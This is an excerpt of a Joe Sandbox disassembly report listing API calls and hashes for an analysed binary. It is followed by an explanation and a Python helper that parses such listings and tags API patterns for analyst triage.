                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: 685e70f8548c6d38cd4f70042f3fbf45aed7ca2dfecdbab1edd3b852feaff203
                                                                      • Instruction ID: d8ee39f9b2561cb0394ce673a7d8feec47f0d7ebe53635d9e398638d3a46b761
                                                                      • Opcode Fuzzy Hash: 685e70f8548c6d38cd4f70042f3fbf45aed7ca2dfecdbab1edd3b852feaff203
                                                                      • Instruction Fuzzy Hash: 03D0C935784311BBE664AB70AC0FFA76A14BB50B50F02082AB24AEA1D1D9E0A804D754
                                                                      APIs
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005959AE
                                                                      • PostMessageW.USER32(00000000), ref: 005959B5
                                                                        • Part of subcall function 00575244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005752BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: 3d1661921dcc809ef8bf15a272e0794a5fb2f808a41f611cb4d8fc165714b1b1
                                                                      • Instruction ID: 07c148d799e31f56ee7008cc14e99304a8d17e599ae83d7c6a57dad18b630751
                                                                      • Opcode Fuzzy Hash: 3d1661921dcc809ef8bf15a272e0794a5fb2f808a41f611cb4d8fc165714b1b1
                                                                      • Instruction Fuzzy Hash: 15D0C9317803117BE664AB70AC0FF976A14BB54B50F02082AB24AEA1D1D9E0A804D754
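The entries above are the per-function summaries the Joe Sandbox IDA plugin produces; across a whole report there are hundreds of them, and the API names alone can mislead. The IsDebuggerPresent hit in the CAtlBaseModule entry is the clearest case: ATL's CAtlBaseModule constructor calls IsDebuggerPresent only to decide whether to OutputDebugString its own "Unable to initialize critical section" message when InitializeCriticalSectionAndSpinCount fails, so that entry is library boilerplate rather than the sample's anti-debug logic. The Python below is an added example, not Joe Sandbox code and not taken from the sample: it parses listing text in this format into entries and tags the API combinations that appear on this page (the ATL pattern, LoadLibrary/GetProcAddress resolution of GetSystemWow64DirectoryW, FindWindowW on Shell_TrayWnd followed by PostMessageW) and decodes message 0x111 as WM_COMMAND; the wParam 0x197 is left as a number because its meaning is not stated on the page. The SAMPLE text is excerpted from the entries above; the tag names and the triage rules are the example's own choices, and the parser handles the "Part of subcall function" lines, the one call line without an argument list (_memset), and empty sections.

```python
"""Triage helper for Joe Sandbox per-function API listings (added example; not Joe Sandbox code)."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# One listing line, "Api.MODULE(args), ref: ADDR" or "Api.MODULE ref: ADDR"; args may contain commas.
CALL_RE = re.compile(r'(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})')
SUBCALL_RE = re.compile(r'Part of subcall function (?P<fn>[0-9A-Fa-f]{8}):')
SECTION_HEADERS = {'Strings', 'Memory Dump Source', 'Joe Sandbox IDA Plugin', 'Similarity'}
WM_NAMES = {0x111: 'WM_COMMAND'}  # only the message number that appears in the listings above
Call = namedtuple('Call', 'api module args ref via')  # via: subcall address, None for a direct call

@dataclass
class Entry:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    api_id: str = ''

def parse_listing(text: str) -> list:
    """Split listing text into one Entry per 'APIs' header; collect calls, strings and API ID."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip('•').strip()
        if not line:
            continue
        if line == 'APIs':
            cur = Entry()
            entries.append(cur)
            section = 'apis'
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if cur is None:
            continue
        if section == 'apis':
            m = CALL_RE.search(line)
            if m:
                sub = SUBCALL_RE.search(line)
                args = m['args'].split(',') if m['args'] else []
                cur.calls.append(Call(m['api'], m['mod'], args, m['ref'], sub['fn'] if sub else None))
        elif section == 'Strings':
            cur.strings.append(line.rsplit(', xrefs:', 1)[0])
        elif section == 'Similarity' and line.startswith('API ID:'):
            cur.api_id = line.split(':', 1)[1].strip()
    return entries

def triage(entry: Entry) -> dict:
    """Tag one entry by the API combinations that matter for triage and explain each tag."""
    apis = {c.api for c in entry.calls}
    tags, notes = [], []
    if 'IsDebuggerPresent' in apis:
        # ATL's CAtlBaseModule constructor calls IsDebuggerPresent only to decide whether to
        # OutputDebugString its own init-failure message: library boilerplate, not sample logic.
        atl = (any('CAtlBaseModule' in ','.join(c.args) for c in entry.calls)
               or any('CAtlBaseModule' in s for s in entry.strings))
        tags.append('atl-boilerplate' if atl else 'anti-debug')
        if atl:
            notes.append('IsDebuggerPresent only gates an ATL init-failure trace message')
    if apis & {'LoadLibraryA', 'LoadLibraryW'} and 'GetProcAddress' in apis:
        tags.append('dynamic-api-resolution')
        for c in entry.calls:
            if c.api == 'GetProcAddress' and len(c.args) >= 2 and c.args[1] != '?':
                notes.append(f'resolves {c.args[1]} at runtime')
    for c in entry.calls:
        if c.api.startswith('FindWindow') and c.args and c.args[0] == 'Shell_TrayWnd':
            tags.append('taskbar-window-messaging')
        if c.api.startswith('PostMessage') and len(c.args) >= 3 and '?' not in c.args[1:3]:
            msg, wparam = int(c.args[1], 16), int(c.args[2], 16)
            notes.append(f'{c.api} msg={WM_NAMES.get(msg, hex(msg))} wParam={hex(wparam)}')
    return {'api_id': entry.api_id, 'tags': tags, 'notes': notes,
            'direct': [c.api for c in entry.calls if c.via is None],
            'via_subcall': sorted({c.api for c in entry.calls if c.via})}

# Constructed sample: three entries excerpted from the function listings on this page.
SAMPLE = """\
APIs
  • Part of subcall function 0054B314: _memset.LIBCMT ref: 0054B321
  • Part of subcall function 00530940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0054B2F0,?,?,?,0051100A), ref: 00530945
• IsDebuggerPresent.KERNEL32(?,?,?,0051100A), ref: 0054B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0051100A), ref: 0054B303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0054B2FE
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 00551775
  • Part of subcall function 0058BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0055195E,?), ref: 0058BFFE
  • Part of subcall function 0058BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0058C010
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0055196D
Similarity
• API ID: Library$AddressDirectoryFreeLoadProcSystem
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0059596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00595981
  • Part of subcall function 00575244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005752BC
Similarity
• API ID: FindMessagePostSleepWindow
"""
```

Run it over the text copied out of a report with `[triage(e) for e in parse_listing(text)]` and look at `tags` and `notes` per entry; `direct` and `via_subcall` keep the distinction the listing draws between the function's own calls and calls it reaches through a subcall. A tag is a reading aid, not a verdict: the report classifies this binary as a likely compiled AutoIt script, so most functions at this image base belong to the interpreter runtime and its libraries, which is exactly why the ATL entry deserves a downgrade rather than an anti-debug flag.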